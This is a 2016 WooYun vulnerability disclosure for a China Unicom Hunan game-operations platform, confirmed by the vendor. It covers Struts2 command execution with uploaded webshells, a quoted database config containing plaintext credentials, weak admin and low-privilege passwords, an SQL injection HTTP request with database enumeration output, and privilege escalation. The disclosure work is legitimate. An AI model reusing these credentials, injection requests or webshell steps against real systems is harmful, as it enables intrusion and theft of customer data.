当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169998

漏洞标题:中国联通某游戏业务平台漏洞打包(命令执行/泄露大量订单信息/可替换app文件等)

相关厂商:中国联通

漏洞作者: JulyTornado

提交时间:2016-01-15 02:30

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

一只哈巴狗
坐在家门口
眼睛黑黝黝
想吃肉骨头
一只哈巴狗
吃完肉骨头
尾巴摇一摇
向我点点头

详细说明:

**.**.**.**/spms/Login!input.action
湖南联通云游平台存在多个漏洞

clipboard.png


0x01、多个Struts2漏洞:

clipboard.png


上菜刀:
**.**.**.**/spms/daozi.jsp

clipboard.png


上大马:
**.**.**.**/spms/pages/test/jspspy.jsp

clipboard.png


0x02、数据库弱口令:
数据库连接配置文件:

/home/deploy/apache-tomcat-6.0.43-manage/webapps/spms/WEB-INF/classes/database.properties
####################################
# Database Connectivity Properties
####################################
driver=oracle.jdbc.driver.OracleDriver
#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl
#url=jdbc:oracle:thin:@**.**.**.**:1521:dev
#url=jdbc:oracle:thin:@**.**.**.**:1521:bjzdgb1
#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl
# gansu local test
#url=jdbc:oracle:thin:@**.**.**.**:1521:sonata
#username=vass
#password=vass
# henan local test
#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl
url=jdbc:oracle:thin:@**.**.**.**:1521:hnuncdb
username=vass
password=vass
#username=dss4
#password=dss4
initialPoolSize=3
acquireIncrement=3
minPoolSize=1
maxPoolSize=2
maxIdleTime=120
encryptType=0
#driver=com.mysql.jdbc.Driver
#url=jdbc:mysql://localhost:3306/test?useUnicode=false&characterEncoding=UTF-8
#username=root
#password=root


数据库用户名密码均为vass

clipboard.png


clipboard.png


0x03、用户密码明文保存,且存在大量弱口令:

clipboard.png


使用admin/bonc2015登录,可泄露大量订单信息,共19720条记录,其中包含订购用户手机号:

clipboard.png


可替换游戏app为木马病毒:

clipboard.png


0x04、SQL注入:
包括但不限于订购明细查询功能,存在SQL注入:

clipboard.png


userTele等参数存在SQL注入:

POST /spms/vass/webPatner/WebPatnerCommon!commissionDetailResult.action HTTP/1.1
Host: **.**.**.**
Content-Length: 83
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.1
Origin: **.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 CoolNovo/**.**.**.**
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: **.**.**.**/spms/vass/webPatner/WebPatnerCommon!commissionDetail.action?__moduleId=69596
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=F3B5DDAD7044023B990E36A131BE9F28; reportUserId=admin
dateType=01&acctDay=2016-01-14&acctMon=2016-01&agentName=&saleSta=-1&userTele=13*&_=


clipboard.png


available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] VAAS
[*] VASS
[*] WMSYS
[*] XDB
[*] YYPUSH


0x05、垂直越权:
使用低权限的bjfyhy/1q2w3e4r5t登录:

clipboard.png


访问只有管理员能够访问的URL,可查看所有用户信息:
**.**.**.**/spms/xframe/security/UserExtend.action?__moduleId=007.001

clipboard.png

漏洞证明:

不深入了

修复方案:

你们比我懂。。。

版权声明:转载请注明来源 JulyTornado@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-01-19 11:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无